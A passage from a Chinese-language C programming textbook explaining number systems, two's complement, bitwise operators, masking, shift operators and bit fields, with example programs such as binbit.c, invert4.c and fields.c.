8类似的菜单。但是该菜单要添加一个新选项:确认座位分配。而且,菜单 中的退出是返回顶层菜单。每次显示都要指明当前正在处理的航班号。另 外,座位分配显示要指明确认状态。 10.编写一个程序,通过一个函数指针数组实现菜单。例如,选择菜单 中的 a,将激活由该数组第 1个元素指向的函数。 11.编写一个名为transform()的函数,接受4个参数:内含double类型数据 的源数组名、内含double类型数据的目标数组名、一个表示数组元素个数的 int类型参数、函数名(或等价的函数指针)。transform()函数应把指定函数 应用于源数组中的每个元素,并把返回值储存在目标数组中。例如: transform(source, target, 100, sin); 该声明会把target[0]设置为sin(source[0]),等等,共有100个元素。在一 个程序中调用transform()4次,以测试该函数。分别使用math.h函数库中的两 个函数以及自定义的两个函数作为参数。 [1].也被称为标记化结构初始化语法。——译者注 1132 第15章 位操作 本章介绍以下内容: 运算符:~、&、|、^、 <<、>> &=、|=、^=、>>=、<<= 二进制、十进制和十六进制记数法(复习) 处理一个值中的位的两个C工具:位运算符和位字段 关键字:_Alignas、_Alignof 在C语言中,可以单独操控变量中的位。读者可能好奇,竟然有人想这 样做。有时必须单独操控位,而且非常有用。例如,通常向硬件设备发送一 两个字节来控制这些设备,其中每个位(bit)都有特定的含义。另外,与 文件相关的操作系统信息经常被储存,通过使用特定位表明特定项。许多压 缩和加密操作都是直接处理单独的位。高级语言一般不会处理这级别的细 节,C 在提供高级语言便利的同时,还能在为汇编语言所保留的级别上工 作,这使其成为编写设备驱动程序和嵌入式代码的首选语言。 首先要介绍位、字节、二进制记数法和其他进制记数系统的一些背景知 识。 1133 15.1 二进制数、位和字节 通常都是基于数字10来书写数字。例如2157的千位是2,百位是1,十位 是5,个位是7,可以写成: 2×1000 + 1×100 + 5×10 + 7×1 注意,1000是10的立方(即3次幂),100是10的平方(即2次幂),10 是10的1次幂,而且10(以及任意正数)的0次幂是1。因此,2157也可以写 成: 2×103+ 1×102+ 5×101+ 7×100 因为这种书写数字的方法是基于10的幂,所以称以10为基底书写2157。 姑且认为十进制系统得以发展是得益于我们都有10根手指。从某种意义 上看,计算机的位只有2根手指,因为它只能被设置为0或1,关闭或打开。 因此,计算机适用基底为2的数制系统。它用2的幂而不是10的幂。以2为基 底表示的数字被称为二进制数(binary number)。二进制中的2和十进制中 的10作用相同。例如,二进制数1101可表示为: 1×23+ 1×22+ 0×21+ 1×20 以十进制数表示为: 1×8 + 1×4 + 0×2 + 1×1 = 13 用二进制系统可以把任意整数(如果有足够的位)表示为0和1的组合。 由于数字计算机通过关闭和打开状态的组合来表示信息,这两种状态分别用 0和1来表示,所以使用这套数制系统非常方便。接下来,我们来学习二进制 系统如何表示1字节的整数。 15.1.1 二进制整数 1134 通常,1字节包含8位。C语言用字节(byte)表示储存系统字符集所需 的大小,所以C字节可能是8位、9位、16位或其他值。不过,描述存储器芯 片和数据传输率中所用的字节指的是8位字节。为了简化起见,本章假设1字 节是8位(计算机界通常用八位组(octet)这个术语特指8位字节)。可以从左 往右给这8位分别编号为7~0。在1字节中,编号是7的位被称为高阶位 (high-order bit),编号是0的位被称为低阶位(low-order bit)。每 1位的 编号对应2的相应指数。因此,可以根据图15.1所示的例子理解字节。 图15.1 位编号和位值 这里,128是2的7次幂,以此类推。该字节能表示的最大数字是把所有 位都设置为1:11111111。这个二进制数的值是: 128 + 64 + 32 + 16 + 8 + 4 + 2 + 1 = 255 而该字节最小的二进制数是00000000,其值为0。因此,1字节可储存0 ~255范围内的数字,总共256个值。或者,通过不同的方式解释位组合 (bit pattern),程序可以用1字节储存-128~+127范围内的整数,总共还是 256个值。例如,通常unsigned char用1字节表示的范围是0~255,而signed char用1字节表示的范围是-128~+127。 15.1.2 有符号整数 如何表示有符号整数取决于硬件,而不是C语言。也许表示有符号数最 简单的方式是用1位(如,高阶位)储存符号,只剩下7位表示数字本身(假 1135 设储存在1字节中)。用这种符号量(sign-magnitude)表示法,10000001表 示−1,00000001表示1。因此,其表示范围是−127~+127。 这种方法的缺点是有两个0:+0和-0。这很容易混淆,而且用两个位组 合来表示一个值也有些浪费。 二进制补码(two’s-complement)方法避免了这个问题,是当今最常用 的系统。我们将以1字节为例,讨论这种方法。二进制补码用1字节中的后7 位表示0~127,高阶位设置为0。目前,这种方法和符号量的方法相同。另 外,如果高阶位是1,表示的值为负。这两种方法的区别在于如何确定负 值。从一个9位组合100000000(256的二进制形式)减去一个负数的位组 合,结果是该负值的量。例如,假设一个负值的位组合是 10000000,作为 一个无符号字节,该组合为表示 128;作为一个有符号值,该组合表示负值 (编码是 7的位为1),而且值为100000000-10000000,即 1000000(128)。因此,该数是-128(在符号量表示法中,该位组合表示 −0)。类似地,10000001 
是−127,11111111 是−1。该方法可以表示−128~ +127范围内的数。 要得到一个二进制补码数的相反数,最简单的方法是反转每一位(即0 变为1,1变为0),然后加1。因为1是00000001,那么−1则是11111110+1, 或11111111。这与上面的介绍一致。 二进制反码(one’s-complement)方法通过反转位组合中的每一位形成 一个负数。例如,00000001是1,那么11111110是−1。这种方法也有一个 −0:11111111。该方法能表示-127~+127之间的数。 15.1.3 二进制浮点数 浮点数分两部分储存:二进制小数和二进制指数。下面我们将详细介 绍。 1.二进制小数 1136 一个普通的浮点数0.527,表示如下: 5/10 + 2/100 + 7/1000 从左往右,各分母都是10的递增次幂。在二进制小数中,使用2的幂作 为分母,所以二进制小数.101表示为: 1/2 + 0/4 + 1/8 用十进制表示法为: 0.50 + 0.00 + 0.125 即是0.625。 许多分数(如,1/3)不能用十进制表示法精确地表示。与此类似,许 多分数也不能用二进制表示法准确地表示。实际上,二进制表示法只能精确 地表示多个1/2的幂的和。因此,3/4和7/8可以精确地表示为二进制小数,但 是1/3和2/5却不能。 2.浮点数表示法 为了在计算机中表示一个浮点数,要留出若干位(因系统而异)储存二 进制分数,其他位储存指数。一般而言,数字的实际值是由二进制小数乘以 2的指定次幂组成。例如,一个浮点数乘以4,那么二进制小数不变,其指数 乘以2,二进制分数不变。如果一份浮点数乘以一个不是2的幂的数,会改变 二进制小数部分,如有必要,也会改变指数部分。 1137 15.2 其他进制数 计算机界通常使用八进制记数系统和十六进制记数系统。因为8和16都 是2的幂,这些系统比十进制系统更接近计算机的二进制系统。 15.2.1 八进制 八进制(octal)是指八进制记数系统。该系统基于8的幂,用0~7表示 数字(正如十进制用0~9表示数字一样)。例如,八进制数451(在C中写 作0451)表示为: 4×82+ 5×81+ 1×80= 297(十进制) 了解八进制的一个简单的方法是,每个八进制位对应3个二进制位。表 15.1列出了这种对应关系。这种关系使得八进制与二进制之间的转换很容 易。例如,八进制数0377的二进制形式是11111111。即,用111代替0377中 的最后一个7,再用111代替倒数第2个7,最后用011代替3,并舍去第1位的 0。这表明比0377大的八进制要用多个字节表示。这是八进制唯一不方便的 地方:一个3位的八进制数可能要用9位二进制数来表示。注意,将八进制数 转换为二进制形式时,不能去掉中间的0。例如,八进制数0173的二进制形 式是01111011,不是0111111。 表15.1 与八进制位等价的二进制位 15.2.2 十六进制 十六进制(hexadecimal或hex)是指十六进制记数系统。该系统基于16 的幂,用0~15表示数字。但是,由于没有单独的数(digit,即0~9这样单 1138 独一位的数)表示10~15,所以用字母A~F来表示。例如,十六进制数 A3F(在C中写作0xA3F)表示为: 10×162+3×161+ 15×160= 2623(十进制) 由于A表示10,F表示15。在C语言中,A~F既可用小写也可用大写。 因此,2623也可写作0xa3f。 每个十六进制位都对应一个4位的二进制数(即4个二进制位),那么两 个十六进制位恰好对应一个8位字节。第1个十六进制表示前4位,第2个十六 进制位表示后4位。因此,十六进制很适合表示字节值。 表15.2列出了各进制之间的对应关系。例如,十六进制值0xC2可转换为 11000010。相反,二进制值11010101可以看作是1101 0101,可转换为 0xD5。 表15.2 十进制、十六进制和等价的二进制 介绍了位和字节的相关内容,接下来我们研究C用位和字节进行哪些操 作。C有两个操控位的工具。第 1 个工具是一套(6 个)作用于位的按位运 算符。第 2 个工具是字段(field)数据形式,用于访问 int中的位。下面将 简要介绍这些C的特性。 1139 15.3 C按位运算符 C 提供按位逻辑运算符和移位运算符。在下面的例子中,为了方便读者 了解位的操作,我们用二进制记数法写出值。但是在实际的程序中不必这 样,用一般形式的整型变量或常量即可。例如,在程序中用25或031或 0x19,而不是00011001。另外,下面的例子均使用8位二进制数,从左往右 每位的编号为7~0。 15.3.1 按位逻辑运算符 4个按位逻辑运算符都用于整型数据,包括char。之所以叫作按位 (bitwise)运算,是因为这些操作都是针对每一个位进行,不影响它左右两 边的位。不要把这些运算符与常规的逻辑运算符(&&、||和!)混淆,常规 的逻辑运算符操作的是整个值。 1.二进制反码或按位取反:~ 一元运算符~把1变为0,把0变为1。如下例子所示: ~(10011010) // 表达式 (01100101)  // 结果值 假设val的类型是unsigned char,已被赋值为2。在二进制中,00000010 表示2。那么,~val的值是11111101,即253。注意,该运算符不会改变val 的值,就像3 * val不会改变val的值一样, val仍然是2。但是,该运算符确实 创建了一个可以使用或赋值的新值: newval = ~val; printf("%d", ~val); 如果要把val的值改为~val,使用下面这条语句: 1140 val = ~val; 2.按位与:& 二元运算符&通过逐位比较两个运算对象,生成一个新值。对于每个 位,只有两个运算对象中相应的位都为1时,结果才为1(从真/假方面看, 只有当两个位都为真时,结果才为真)。因此,对下面的表达式求值: (10010011) & (00111101)  // 表达式 由于两个运算对象中编号为4和0的位都为1,得: (00010001)  // 结果值 C有一个按位与和赋值结合的运算符:&=。下面两条语句产生的最终结 果相同: val &= 0377; val = val & 0377; 3.按位或:| 二元运算符|,通过逐位比较两个运算对象,生成一个新值。对于每个 位,如果两个运算对象中相应的位为1,结果就为1(从真/假方面看,如果 两个运算对象中相应的一个位为真或两个位都为真,那么结果为真)。因 此,对下面的表达式求值: (10010011) | (00111101) // 表达式 除了编号为6的位,这两个运算对象的其他位至少有一个位为1,得: (10111111) // 结果值 C有一个按位或和赋值结合的运算符:|=。下面两条语句产生的最终作 用相同: 1141 val |= 0377; val = val | 0377; 4.按位异或:^ 二元运算符^逐位比较两个运算对象。对于每个位,如果两个运算对象 中相应的位一个为1(但不是两个为1),结果为1(从真/假方面看,如果两 个运算对象中相应的一个位为真且不是两个为同为1,那么结果为真)。因 此,对下面表达式求值: (10010011) ^ (00111101) // 表达式 编号为0的位都是1,所以结果为0,得: (10101110)  // 结果值 C有一个按位异或和赋值结合的运算符:^=。下面两条语句产生的最终 作用相同: val ^= 0377; val = val ^ 0377; 15.3.2 用法:掩码 按位与运算符常用于掩码(mask)。所谓掩码指的是一些设置为开 (1)或关(0)的位组合。要明白称其为掩码的原因,先来看通过&把一个 量与掩码结合后发生什么情况。例如,假设定义符号常量MASK为2 (即, 二进制形式为00000010),只有1号位是1,其他位都是0。下面的语句: flags = flags & MASK; 把flags中除1号位以外的所有位都设置为0,因为使用按位与运算符 (&)任何位与0组合都得0。1号位的值不变(如果1号位是1,那么 1&1得 1142 1;如果 1号位是0,那么 0&1也得0)。这个过程叫作“使用掩码”,因为掩 码中的0隐藏了flags中相应的位。 可以这样类比:把掩码中的0看作不透明,1看作透明。表达式flags 
& MASK相当于用掩码覆盖在flags的位组合上,只有MASK为1的位才可见(见 图15.2)。 图15.2 掩码示例 用&=运算符可以简化前面的代码,如下所示: flags &= MASK; 下面这条语句是按位与的一种常见用法: ch &= 0xff; /* 或者 ch &= 0377; */ 前面介绍过oxff的二进制形式是11111111,八进制形式是0377。这个掩 码保持ch中最后8位不变,其他位都设置为0。无论ch原来是8位、16位或是 其他更多位,最终的值都被修改为1个8位字节。在该例中,掩码的宽度为8 1143 位。 15.3.3 用法:打开位(设置位) 有时,需要打开一个值中的特定位,同时保持其他位不变。例如,一台 IBM PC 通过向端口发送值来控制硬件。例如,为了打开内置扬声器,必须 打开 1 号位,同时保持其他位不变。这种情况可以使用按位或运算符 (|)。 以上一节的flags和MASK(只有1号位为1)为例。下面的语句: flags = flags | MASK; 把flags的1号位设置为1,且其他位不变。因为使用|运算符,任何位与0 组合,结果都为本身;任何位与1组合,结果都为1。 例如,假设flags是00001111,MASK是10110110。下面的表达式: flags | MASK 即是: (00001111) | (10110110)  // 表达式 其结果为: (10111111)         // 结果值 MASK中为1的位,flags与其对应的位也为1。MASK中为0的位,flags与 其对应的位不变。 用|=运算符可以简化上面的代码,如下所示: flags |= MASK; 同样,这种方法根据MASK中为1的位,把flags中对应的位设置为1,其 1144 他位不变。 15.3.4 用法:关闭位(清空位) 和打开特定的位类似,有时也需要在不影响其他位的情况下关闭指定的 位。假设要关闭变量flags中的1号位。同样,MASK只有1号位为1(即,打 开)。可以这样做: flags = flags & ~MASK; 由于MASK除1号位为1以外,其他位全为0,所以~MASK除1号位为0 以外,其他位全为1。使用&,任何位与1组合都得本身,所以这条语句保持 1号位不变,改变其他各位。另外,使用&,任何位与0组合都的0。所以无 论1号位的初始值是什么,都将其设置为0。 例如,假设flags是00001111,MASK是10110110。下面的表达式: flags & ~MASK 即是: (00001111) & ~(10110110) // 表达式 其结果为: (00001001)         // 结果值 MASK中为1的位在结果中都被设置(清空)为0。flags中与MASK为0的 位相应的位在结果中都未改变。 可以使用下面的简化形式: flags &= ~MASK; 15.3.5 用法:切换位 1145 切换位指的是打开已关闭的位,或关闭已打开的位。可以使用按位异或 运算符(^)切换位。也就是说,假设b是一个位(1或0),如果b为1,则 1^b为0;如果b为0,则1^b为1。另外,无论b为1还是0,0^b均为b。因此, 如果使用^组合一个值和一个掩码,将切换该值与MASK为1的位相对应的 位,该 值与MASK为0的位相对应的位不变。要切换flags中的1号位,可以使用 下面两种方法: flags = flags ^ MASK; flags ^= MASK; 例如,假设flags是00001111,MASK是10110110。表达式: flags ^ MASK 即是: (00001111) ^ (10110110)  // 表达式 其结果为: (10111001)         // 结果值 flags中与MASK为1的位相对应的位都被切换了,MASK为0的位相对应 的位不变。 15.3.6 用法:检查位的值 前面介绍了如何改变位的值。有时,需要检查某位的值。例如,flags中 1号位是否被设置为1?不能这样直接比较flags和MASK: if (flags == MASK) puts("Wow!"); /* 不能正常工作 */ 1146 这样做即使flags的1号位为1,其他位的值会导致比较结果为假。因此, 必须覆盖flags中的其他位,只用1号位和MASK比较: if ((flags & MASK) == MASK) puts("Wow!"); 由于按位运算符的优先级比==低,所以必须在flags & MASK周围加上 圆括号。 为了避免信息漏过边界,掩码至少要与其覆盖的值宽度相同。 15.3.7 移位运算符 下面介绍C的移位运算符。移位运算符向左或向右移动位。同样,我们 在示例中仍然使用二进制数,有助于读者理解其工作原理。 1.左移:<< 左移运算符(<<)将其左侧运算对象每一位的值向左移动其右侧运算 对象指定的位数。左侧运算对象移出左末端位的值丢失,用0填充空出的位 置。下面的例子中,每一位都向左移动两个位置: (10001010) << 2  // 表达式 (00101000)    // 结果值 该操作产生了一个新的位值,但是不改变其运算对象。例如,假设 stonk为1,那么 stonk<<2为4,但是stonk本身不变,仍为1。可以使用左移赋 值运算符(<<=)来更改变量的值。该运算符将变量中的位向左移动其右侧 运算对象给定值的位数。如下例: int stonk = 1; int onkoo; 1147 onkoo = stonk << 2;  /* 把4赋给onkoo */ stonk <<= 2;     /* 把stonk的值改为4 */ 2.右移:>> 右移运算符(>>)将其左侧运算对象每一位的值向右移动其右侧运算 对象指定的位数。左侧运算对象移出右末端位的值丢。对于无符号类型,用 0 填充空出的位置;对于有符号类型,其结果取决于机器。空出的位置可用 0填充,或者用符号位(即,最左端的位)的副本填充: (10001010) >> 2    // 表达式,有符号值 (00100010)       // 在某些系统中的结果值 (10001010) >> 2    // 表达式,有符号值 (11100010)       // 在另一些系统上的结果值 下面是无符号值的例子: (10001010) >> 2    // 表达式,无符号值 (00100010)       // 所有系统都得到该结果值 每个位向右移动两个位置,空出的位用0填充。 右移赋值运算符(>>=)将其左侧的变量向右移动指定数量的位数。如 下所示: int sweet = 16; int ooosw; ooosw = sweet >> 3;  // ooosw = 2,sweet的值仍然为16 1148 sweet >>=3;      // sweet的值为2 3.用法:移位运算符 移位运算符针对2的幂提供快速有效的乘法和除法: number << n    number乘以2的n次幂 number >> n    如果number为非负,则用number除以2的n次幂 这些移位运算符类似于在十进制中移动小数点来乘以或除以10。 移位运算符还可用于从较大单元中提取一些位。例如,假设用一个 unsigned long类型的值表示颜色值,低阶位字节储存红色的强度,下一个字 节储存绿色的强度,第 3 个字节储存蓝色的强度。随后你希望把每种颜色的 强度分别储存在3个不同的unsigned char类型的变量中。那么,可以使用下面 的语句: #define BYTE_MASK 0xff unsigned long color = 0x002a162f; unsigned char blue, green, red; red = color & BYTE_MASK; green = (color >> 8) & BYTE_MASK; blue = (color >> 16) & BYTE_MASK; 以上代码中,使用右移运算符将 8 位颜色值移动至低阶字节,然后使用 掩码技术把低阶字节赋给指定的变量。 15.3.8 编程示例 在第 9 章中,我们用递归的方法编写了一个程序,把数字转换为二进制 1149 形式(程序清单 9.8)。现在,要用移位运算符来解决相同的问题。程序清 单15.1中的程序,读取用户从键盘输入的整数,将该整数和一个字符串地址 
传递给itobs()函数(itobs表示interger to binary string,即整数转换成二进制字 符串)。然后,该函数使用移位运算符计算出正确的1和0的组合,并将其放 入字符串中。 程序清单15.1 binbit.c程序 /* binbit.c -- 使用位操作显示二进制 */ #include <stdio.h> #include <limits.h> // 提供 CHAR_BIT 的定义,CHAR_BIT 表示每字节 的位数 char * itobs(int, char *); void show_bstr(const char *); int main(void) { char bin_str[CHAR_BIT * sizeof(int) + 1]; int number; puts("Enter integers and see them in binary."); puts("Non-numeric input terminates program."); while (scanf("%d", &number) == 1) { itobs(number, bin_str); 1150 printf("%d is ", number); show_bstr(bin_str); putchar('\n'); } puts("Bye!"); return 0; } char * itobs(int n, char * ps) { int i; const static int size = CHAR_BIT * sizeof(int); for (i = size - 1; i >= 0; i--, n >>= 1) ps[i] = (01 & n) + '0'; ps[size] = '\0'; return ps; } /*4位一组显示二进制字符串 */ void show_bstr(const char * str) { 1151 int i = 0; while (str[i]) /* 不是一个空字符 */ { putchar(str[i]); if (++i % 4 == 0 && str[i]) putchar(' '); } } 程序清单15.1使用limits.h中的CHAR_BIT宏,该宏表示char中的位数。 sizeof运算符返回char的大小,所以表达式CHAE_BIT * sizeof(int)表示int类型 的位数。bin_str数组的元素个数是CHAE_BIT * sizeof(int) + 1,留出一个位置 给末尾的空字符。 itobs()函数返回的地址与传入的地址相同,可以把该函数作为printf()的 参数。在该函数中,首次执行for循环时,对01 & n求值。01是一个八进制形 式的掩码,该掩码除0号位是1之外,其他所有位都为0。因此,01 & n就是n 最后一位的值。该值为0或1。但是对数组而言,需要的是字符'0'或字符'1'。 该值加上'0'即可完成这种转换(假设按顺序编码的数字,如 ASCII)。其结 果存放在数组中倒数第2个元素中(最后一个元素用来存放空字符)。 顺带一提,用1 & n或01 & n都可以。我们用八进制1而不是十进制1,只 是为了更接近计算机的表达方式。 然后,循环执行i--和n >>= 1。i--移动到数组的前一个元素,n >>= 1使n 中的所有位向右移动一个位置。进入下一轮迭代时,循环中处理的是n中新 的最右端的值。然后,把该值储存在倒数第3个元素中,以此类推。itobs() 函数用这种方式从右往左填充数组。 1152 可以使用printf()或puts()函数显示最终的字符串,但是程序清单15.1中定 义了show_bstr()函数,以4位一组打印字符串,方便阅读。 下面的该程序的运行示例: Enter integers and see them in binary. Non-numeric input terminates program. 7 7 is 0000 0000 0000 0000 0000 0000 0000 0111 2013 2013 is 0000 0000 0000 0000 0000 0111 1101 1101 -1 -1 is 1111 1111 1111 1111 1111 1111 1111 1111 32123 32123 is 0000 0000 0000 0000 0111 1101 0111 1011 q Bye! 
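在进入下一个例子之前,这里给出一个简短的示例草图(并非书中的程序清单),把15.3.3节~15.3.6节介绍的打开位、关闭位、切换位和检查位的掩码用法汇总在一起。其中 flags 的初始值和只打开1号位的 MASK 都是为演示而假设的:

/* maskdemo.c -- 掩码操作小结(示例草图) */
#include <stdio.h>
#define MASK 0x02                     /* 只有1号位为1的掩码 */

int main(void)
{
    unsigned char flags = 0x0F;       /* 二进制 00001111 */

    flags |= MASK;                    /* 打开1号位,结果仍为 00001111 */
    flags &= ~MASK;                   /* 关闭1号位,结果为 00001101 */
    flags ^= MASK;                    /* 切换1号位,结果为 00001111 */
    if ((flags & MASK) == MASK)       /* 检查1号位是否为1 */
        puts("bit 1 is set");
    printf("flags = %#x\n", (unsigned int) flags);

    return 0;
}

注意每一步都只影响 MASK 中为1的那一位,其余位保持不变,这正是前面各节所强调的要点。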
15.3.9 另一个例子 我们来看另一个例子。这次要编写的函数用于切换一个值中的后 n 位, 待处理值和 n 都是函数的参数。 ~运算符切换一个字节的所有位,而不是选定的少数位。但是,^运算 符(按位异或)可用于切换单个位。假设创建了一个掩码,把后n位设置为 1153 1,其余位设置为0。然后使用^组合掩码和待切换的值便可切换该值的最后n 位,而且其他位不变。方法如下: int invert_end(int num, int bits) { int mask = 0; int bitval = 1; while (bits–– > 0) { mask |= bitval; bitval <<= 1; } return num ^ mask; } while循环用于创建所需的掩码。最初,mask的所有位都为0。第1轮循 环将mask的0号位设置为1。然后第2轮循环将mask的1号位设置为1,以此类 推。循环bits次,mask的后bits位就都被设置为1。最后,num ^ mask运算即得 所需的结果。 我们把这个函数放入前面的程序中,测试该函数。如程序清单15.2所 示。 程序清单15.2 invert4.c程序 /* invert4.c -- 使用位操作显示二进制 */ 1154 #include <stdio.h> #include <limits.h> char * itobs(int, char *); void show_bstr(const char *); int invert_end(int num, int bits); int main(void) { char bin_str[CHAR_BIT * sizeof(int) + 1]; int number; puts("Enter integers and see them in binary."); puts("Non-numeric input terminates program."); while (scanf("%d", &number) == 1) { itobs(number, bin_str); printf("%d is\n", number); show_bstr(bin_str); putchar('\n'); number = invert_end(number, 4); printf("Inverting the last 4 bits gives\n"); 1155 show_bstr(itobs(number, bin_str)); putchar('\n'); } puts("Bye!"); return 0; } char * itobs(int n, char * ps) { int i; const static int size = CHAR_BIT * sizeof(int); for (i = size - 1; i >= 0; i--, n >>= 1) ps[i] = (01 & n) + '0'; ps[size] = '\0'; return ps; } /* 以4位为一组,显示二进制字符串 */ void show_bstr(const char * str) { int i = 0; 1156 while (str[i]) /* 不是空字符 */ { putchar(str[i]); if (++i % 4 == 0 && str[i]) putchar(' '); } } int invert_end(int num, int bits) { int mask = 0; int bitval = 1; while (bits-- > 0) { mask |= bitval; bitval <<= 1; } return num ^ mask; } 下面是该程序的一个运行示例: 1157 Enter integers and see them in binary. Non-numeric input terminates program. 7 7 is 0000 0000 0000 0000 0000 0000 0000 0111 Inverting the last 4 bits gives 0000 0000 0000 0000 0000 0000 0000 1000 12541 12541 is 0000 0000 0000 0000 0011 0000 1111 1101 Inverting the last 4 bits gives 0000 0000 0000 0000 0011 0000 1111 0010 q Bye! 
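顺带一提,当 bits 小于 unsigned int 的位数时,也可以不用循环,直接用移位运算构造出同样的掩码。下面是一个等价的示例草图(非书中代码,函数名 invert_end2 是为演示而取的):

int invert_end2(int num, int bits)
{
    unsigned int mask = (1u << bits) - 1;   /* bits 为4时,mask 为 0xF */

    return num ^ (int) mask;
}

表达式 (1u << bits) - 1 先得到只有编号为 bits 的位为1的值,再减1,恰好使后 bits 位全部变为1,效果与循环版本相同。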
1158 15.4 位字段 操控位的第2种方法是位字段(bit field)。位字段是一个signed int或 unsigned int类型变量中的一组相邻的位(C99和C11新增了_Bool类型的位字 段)。位字段通过一个结构声明来建立,该结构声明为每个字段提供标签, 并确定该字段的宽度。例如,下面的声明建立了一个4个1位的字段: struct { unsigned int autfd : 1; unsigned int bldfc : 1; unsigned int undln : 1; unsigned int itals : 1; } prnt; 根据该声明,prnt包含4个1位的字段。现在,可以通过普通的结构成员 运算符(.)单独给这些字段赋值: prnt.itals = 0; prnt.undln = 1; 由于每个字段恰好为1位,所以只能为其赋值1或0。变量prnt被储存在 int大小的内存单元中,但是在本例中只使用了其中的4位。 带有位字段的结构提供一种记录设置的方便途径。许多设置(如,字体 的粗体或斜体)就是简单的二选一。例如,开或关、真或假。如果只需要使 用 1 位,就不需要使用整个变量。内含位字段的结构允许在一个存储单元中 储存多个设置。 有时,某些设置也有多个选择,因此需要多位来表示。这没问题,字段 1159 不限制 1 位大小。可以使用如下的代码: struct { unsigned int code1 : 2; unsigned int code2 : 2; unsigned int code3 : 8; } prcode; 以上代码创建了两个2位的字段和一个8位的字段。可以这样赋值: prcode.code1 = 0; prcode.code2 = 3; prcode.code3 = 102; 但是,要确保所赋的值不超出字段可容纳的范围。 如果声明的总位数超过了一个unsigned int类型的大小会怎样?会用到下 一个unsigned int类型的存储位置。一个字段不允许跨越两个unsigned int之间 的边界。编译器会自动移动跨界的字段,保持unsigned int的边界对齐。一旦 发生这种情况,第1个unsigned int中会留下一个未命名的“洞”。 可以用未命名的字段宽度“填充”未命名的“洞”。使用一个宽度为0的未 命名字段迫使下一个字段与下一个整数对齐: struct { unsigned int field1  : 1 ; unsigned int      : 2 ; 1160 unsigned int field2  : 1 ; unsigned int      : 0 ; unsigned int field3  : 1 ; } stuff; 这里,在stuff.field1和stuff.field2之间,有一个2位的空隙;stuff.field3将 储存在下一个unsigned int中。 字段储存在一个int中的顺序取决于机器。在有些机器上,存储的顺序是 从左往右,而在另一些机器上,是从右往左。另外,不同的机器中两个字段 边界的位置也有区别。由于这些原因,位字段通常都不容易移植。尽管如 此,有些情况却要用到这种不可移植的特性。例如,以特定硬件设备所用的 形式储存数据。 15.4.1 位字段示例 通常,把位字段作为一种更紧凑储存数据的方式。例如,假设要在屏幕 上表示一个方框的属性。为简化问题,我们假设方框具有如下属性: 方框是透明的或不透明的; 方框的填充色选自以下调色板:黑色、红色、绿色、黄色、蓝色、紫 色、青色或白色; 边框可见或隐藏; 边框颜色与填充色使用相同的调色板; 边框可以使用实线、点线或虚线样式。 可以使用单独的变量或全长(full-sized)结构成员来表示每个属性,但 是这样做有些浪费位。例如,只需1位即可表示方框是透明还是不透明;只 1161 需1位即可表示边框是显示还是隐藏。8种颜色可以用3位单元的8个可能的值 来表示,而3种边框样式也只需2位单元即可表示。总共10位就足够表示方框 的5个属性设置。 一种方案是:一个字节储存方框内部(透明和填充色)的属性,一个字 节储存方框边框的属性,每个字节中的空隙用未命名字段填充。struct box_props声明如下: struct box_props { bool opaque         : 1 ; unsigned int fill_color  : 3 ; unsigned int        : 4 ; bool show_border      : 1 ; unsigned int border_color : 3 ; unsigned int border_style : 2 ; unsigned int        : 2 ; }; 加上未命名的字段,该结构共占用 16 位。如果不使用填充,该结构占 用 10 位。但是要记住,C 以unsigned int作为位字段结构的基本布局单元。 因此,即使一个结构唯一的成员是1位字段,该结构的大小也是一个unsigned int类型的大小,unsigned int在我们的系统中是32位。另外,以上代码假设 C99新增的_Bool类型可用,在stdbool.h中,bool是_Bool的别名。 对于opaque成员,1表示方框不透明,0表示透明。show_border成员也 用类似的方法。对于颜色,可以用简单的RGB(即red-green-blue的缩写)表 示。这些颜色都是三原色的混合。显示器通过混合红、绿、蓝像素来产生不 1162 同的颜色。在早期的计算机色彩中,每个像素都可以打开或关闭,所以可以 使用用 1 位来表示三原色中每个二进制颜色的亮度。常用的顺序是,左侧位 表示蓝色亮度、中间位表示绿色亮度、右侧位表示红色亮度。表15.3列出了 这8种可能的组合。fill_color成员和border_color成员可以使用这些组合。最 后,border_style成员可以使用0、1、2来表示实线、点线和虚线样式。 表15.3 简单的颜色表示 程序清单15.3中的程序使用box_props结构,该程序用#define创建供结构 成员使用的符号常量。注意,只打开一位即可表示三原色之一。其他颜色用 三原色的组合来表示。例如,紫色由打开的蓝色位和红色位组成,所以,紫 色可表示为BLUE|RED。 程序清单15.3 fields.c程序 /* fields.c -- 定义并使用字段 */ #include <stdio.h> #include <stdbool.h>  // C99定义了bool、true、false /* 线的样式 */ #define SOLID  0 #define DOTTED 1 #define DASHED 2 1163 /* 三原色 */ #define BLUE  4 #define GREEN  2 #define RED  1 /* 混合色 */ #define BLACK  0 #define YELLOW (RED | GREEN) #define MAGENTA (RED | BLUE) #define CYAN  (GREEN | BLUE) #define WHITE  (RED | GREEN | BLUE) const char * colors[8] = { "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white" }; struct box_props { bool opaque : 1;    // 或者 unsigned int (C99以前) unsigned int fill_color : 3; unsigned int : 4; bool show_border : 1; // 或者 unsigned int (C99以前) unsigned int border_color : 3; unsigned int border_style : 2; 1164 unsigned int : 2; }; void show_settings(const struct box_props * pb); int main(void) { /* 创建并初始化 box_props 结构 */ struct box_props box = { true, YELLOW, 
true, GREEN, DASHED }; printf("Original box settings:\n"); show_settings(&box); box.opaque = false; box.fill_color = WHITE; box.border_color = MAGENTA; box.border_style = SOLID; printf("\nModified box settings:\n"); show_settings(&box); return 0; } void show_settings(const struct box_props * pb) { 1165 printf("Box is %s.\n", pb->opaque == true ? "opaque" : "transparent"); printf("The fill color is %s.\n", colors[pb->fill_color]); printf("Border %s.\n", pb->show_border == true ? "shown" : "not shown"); printf("The border color is %s.\n", colors[pb->border_color]); printf("The border style is "); switch (pb->border_style) { case SOLID: printf("solid.\n"); break; case DOTTED: printf("dotted.\n"); break; case DASHED: printf("dashed.\n"); break; default:   printf("unknown type.\n"); } } 下面是该程序的输出: Original box settings: Box is opaque. The fill color is yellow. 1166 Border shown. The border color is green. The border style is dashed. Modified box settings: Box is transparent. The fill color is white. Border shown. The border color is magenta. The border style is solid. 该程序要注意几个要点。首先,初始化位字段结构与初始化普通结构的 语法相同: struct box_props box = {YES, YELLOW , YES, GREEN, DASHED}; 类似地,也可以给位字段成员赋值: box.fill_color = WHITE; 另外,switch语句中也可以使用位字段成员,甚至还可以把位字段成员 用作数组的下标: printf("The fill color is %s.\n", colors[pb->fill_color]); 注意,根据 colors 数组的定义,每个索引对应一个表示颜色的字符串, 而每种颜色都把索引值作为该颜色的数值。例如,索引1对应字符串"red", 枚举常量red的值是1。 1167 15.4.2 位字段和按位运算符 